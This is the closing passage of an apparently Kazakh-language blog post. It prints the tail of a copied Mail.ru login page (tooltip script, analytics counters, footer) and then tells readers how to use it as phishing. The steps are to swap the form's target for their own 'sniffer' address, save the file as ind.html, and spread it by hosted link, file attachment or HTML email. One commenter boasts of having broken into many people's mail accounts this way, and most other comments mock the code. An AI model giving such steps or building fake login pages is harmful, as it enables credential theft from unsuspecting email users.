			keydown: function(e) {
				 var evt = e ? e : window.event;
				 var keyCode = evt.keyCode ? evt.keyCode : evt.charCode;
				 if ( keyCode == 20 && tooltipAuth.wasCaps == 'off' )
					tooltipAuth.show(2);
				 else
				 	tooltipAuth.hide();
			},
            checkCondition: function(e) {
                var evt = e ? e : event;
                var evtEl = evt.srcElement ? evt.srcElement : evt.target;
                
                var keyCode = evt.keyCode ? evt.keyCode : evt.charCode;
                
                var symb = String.fromCharCode(keyCode);
                var symbUC = symb.toUpperCase();
                var symbLC = symb.toLowerCase();
				
                var onCapsLock = false;
                if(symbUC != symbLC) {
                    onCapsLock = ((evt.shiftKey && symbLC == symb) || (!evt.shiftKey && symbUC == symb));
					tooltipAuth.wasCaps = onCapsLock ? 'on' : 'off';
				} else
					tooltipAuth.wasCaps = false;
                    
                var isCyrillic = false;
				if( /[а-я]/i.test(symb) )
                    isCyrillic = true;
					
				var hasCyrillic = false;
				if( /[а-я]/i.test(tooltipAuth.targetElem.value) )
                    hasCyrillic = true;
                
                var messNum;
                
				if (hasCyrillic)
					messNum = 3;
                if (onCapsLock)
                    messNum = 2;
                if (isCyrillic)
                    messNum = 1;

                if (messNum)
                {
                    //if(tooltipAuth.shell.style.display == 'none')
                        tooltipAuth.show(messNum);
                }
                else
                    tooltipAuth.hide();
            }
        };
        
        try {
            tooltipAuth.activate();
        } catch(ex) {};
        
    }
    </script>

<!-- /AuthTooltip -->



<script type="text/javascript">//<![CDATA[
try{ timeInterval_sum('msglist_html'); }catch(e) {}
try{ timeInterval_sum('msglist_js'); }catch(e) {}
//]]></script>



<table cellpadding=0 cellspacing=0 border=0 width=90%><tr><td>
<img src=http://img.mail.ru/0.gif width=760 height=2>
<table width=100% cellpadding=0 cellspacing=0 border=0 class=lasttab><tr>
<td class=lastgr colspan=7><img src=http://img.mail.ru/1.gif width=1 height=1></td>
</tr><tr>
<td><img src=http://img.mail.ru/0.gif width=20 height=1></td>
<td width=30% nowrap>© 1999-2011, <a cnt_sb="9082" href="http://corp.mail.ru/" class="mf_w">Mail.Ru</a></td>
<td nowrap><a href="http://r.mail.ru/n64061059">Регистрация</a> <b>·</b> <a href="http://r.mail.ru/n64061060" target="_blank">Cообщество пользователей</a> <b>·</b> 




<script type="text/javascript">//<![CDATA[
try{ timeInterval_sum('reklama_rb'); }catch(e) {}
//]]></script>

</center>

<script type="text/javascript">//<![CDATA[
try{ timeInterval_sum('reklama_rb'); }catch(e) {}
//]]></script>




<div style="position: absolute;">

<img src="http://rs.mail.ru/d227223.gif?rnd=908448484&ts=1305658469" width="1" height="1" border="0" alt="" style="position:absolute;"/>
<script type="text/javascript"><!--
document.write("<img src='http://counter.yadro.ru/hit?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(('getHref' in location) ? location.getHref() : document.URL)+
";"+Math.random()+
"' width=1 height=1 alt=''>")//--></script>

<!--Rating@Mail.ru counter-->
<script language="javascript" type="text/javascript"><!--
d=document;var a='';a+=';u='+escape(('getHref' in location) ? location.getHref() : document.URL);
a+=';r='+escape(d.referrer);js=10;//--></script>
<script language="javascript1.1" type="text/javascript"><!--
a+=';j='+navigator.javaEnabled();js=11;//--></script>
<script language="javascript1.2" type="text/javascript"><!--
s=screen;a+=';s='+s.width+'*'+s.height;
a+=';d='+(s.colorDepth?s.colorDepth:s.pixelDepth);js=12;//--></script>
<script language="javascript1.3" type="text/javascript"><!--
js=13;//--></script><script language="javascript" type="text/javascript"><!--
d.write('<img src="http://top5.mail.ru/counter'+'?id=110605;js='+js+
a+';rand='+Math.random()+'" height="1" width="1" alt="top.mail.ru" border="0">');
if(11<js)d.write('<'+'!-- ')//--></script>
<noscript><img src="http://top5.mail.ru/counter?js=na;id=110605" 
height="1" width="1" alt="top.mail.ru" border="0"></noscript>
<script language="javascript" type="text/javascript"><!--
if(11<js)d.write('--'+'>');//--></script>

<!--// Rating@Mail.ru counter-->

<!-- Rating@Mail.ru counter -->
<script type="text/javascript">//<![CDATA[
var a='';js=10;d=document;
if('getHref' in location)a+=';u='+escape(location.getHref());
try{a+=';r='+escape(d.referrer);}catch(e){}try{a+=';j='+navigator.javaEnabled();js=11;}catch(e){}
try{s=screen;a+=';s='+s.width+'*'+s.height;a+=';d='+(s.colorDepth?s.colorDepth:s.pixelDepth);js=12;}catch(e){}
try{if(typeof((new Array).push('t'))==="number")js=13;}catch(e){}
try{d.write('<a href="http://top.mail.ru/jump?from=2035946"><img src="http://d0.c1.bf.a1.top.mail.ru/counter?id=2035946;js='+js+
a+';rand='+Math.random()+'" alt="Рейтинг@Mail.ru" style="border:0;" height="1" width="1" \/><\/a>');}catch(e){}//]]></script>
<noscript><p><a href="http://top.mail.ru/jump?from=2035946"><img src="http://d0.c1.bf.a1.top.mail.ru/counter?js=na;id=2035946"
style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" /></a></p></noscript>
<!-- //Rating@Mail.ru counter -->



</div>


<!-- sln:3 --><img src="http://rs.mail.ru/d428625.gif?rnd=975078330&ts=1305658469" width="1" height="1" border="0" alt="" style="position:absolute;"/>
<script type="text/javascript">
//<![CDATA[
(function() {
	var addHandler = function(o, e, fn) {
		if (o.addEventListener) o.addEventListener(e, fn, false);
		else if (o.attachEvent) o.attachEvent('on' + e, fn);
		else o['on' + e] = fn;
	}
	addHandler(document, 'mousedown', function(e) {
		e = e || window.event;
		e = e.target || e.srcElement;
		var name;
		while (e.parentNode) {
			if ((name = e.getAttribute('name')) && (name = name.toString())) {
				if ( name.match(new RegExp("^cl([bn]\\d+)")) )
					document.createElement("IMG").src = "http://rs.mail.ru/s"+RegExp.$1+".gif?rnd=" + Math.random()*1E9;
				if ( name.match(new RegExp("^(g\\d+)")) )
					document.createElement("IMG").src = "http://rs.mail.ru/"+RegExp.$1+".gif?rnd=" + Math.random()*1E9;
				if ( name.match(new RegExp("^(i\\d+)")) )
					document.createElement("IMG").src = "http://rs.mail.ru/"+RegExp.$1+".gif";
			}
			e = e.parentNode;
		}
		return true;
	});
})();
//]]>
</script>

<img src="http://rs.mail.ru/un?uniq=" width="1" height="1" border="0" alt="" style="position:absolute;"/><!-- /sln:3 -->


<script type="text/javascript">//<![CDATA[
try {

timeInterval('renderbrowser');
rT.iGet = '';
for (var i = 0; i < rT.i.length; i++) {
        rT.comma = rT.iGet != '' ? ',' : '';
        var bP = rT.i[i].split('=');
        if (bP[0] != 'renderbrowser') {
                rT.iGet += (rT.comma + bP[0] + ':' + bP[1]);
        } else rT.renderbrowser = parseInt(bP[1]);
}
rT.comma = '';

rT.img = new Image(); rT.img.src='http://mail.radar.imgsmail.ru/update?p=mail&t=&v=' + rT.renderbrowser + '&i=' + rT.iGet + '&rnd=569234100' + (document.referrer ? '&r=' + escape(document.referrer) : '') + '';

} catch(e) {}
//]]></script>

        

</body>
</html>


Бұл скриптіден іздеп „Сайтадресі„ дегенді тауып алып, өзіңіздің снифердің адресімен алмастырасыз да кез келген атмен сақтаңыз, мысалға: ind.html

Ендігі кезек қолдану.
1 ind.html файлын хостингке салып, сілтеме таратуға болады.
2 файлдың өзін жібере салуға болады.
3 HTML хат жазуға болады, ол туралы кейін қол тигенде
Бөлісу:

12 пікір

asaubota
Fake дейтінбіз біз. осыған қызығып талай адамның поштасын бұздық қой, hotmail, yahoo, mail.ru, mail.md… қазір ойласам ұят… :)
Nurgisa
Өте танымдық жазба екен. Бір деммен оқып шықтым!
sigma
Аршат 15000 символдық шектеуді өзгертпегенде бір деммен жаза алмас едім
qisyq
Әсіресе "addHandler(document, 'mousedown', function(e) {" дегенде еріксіз солқ-солқ етіп, жылап жібердім.
d.write('top.mail.ru');
if(11<js)d.write('<'+'!-- ')//-->

дегені де әсерлі
edige
var i,j;
var str = '';
var bad_field;
var fields = new Array();
var prompts = new Array();

fields[fields.length] = 'Login';
prompts[prompts.length] = 'Логин';
Абайдың "Қара сөздері" стилінде жазылғаны керемет
qisyq
float: right;
_margin-left: -3px;
_margin-right: 0;
*margin-right: -3px;
Жыр үлгісінде жазылған, байқадың ба? 7-8 жолдық.
edige
Сегіз аяқ еске түсті жай ғана. Жоғарыдағы жазбада…
Не ругайся насәйнике!!!
Zilola
мазақтауға келгенде мықтысыңдар әйтеуір, өшіп отырм күлкіден :))))))))))))
konvict
Мынаны түсініп біткенше ахимен айтысқаным артық екен.
asaubota
түсінетін адамдарға жазылған мақала ғой, оның несін мазақ қылып камент жазып отырсыңдар? барлық мақалаларға камент жазу міндет емес қой.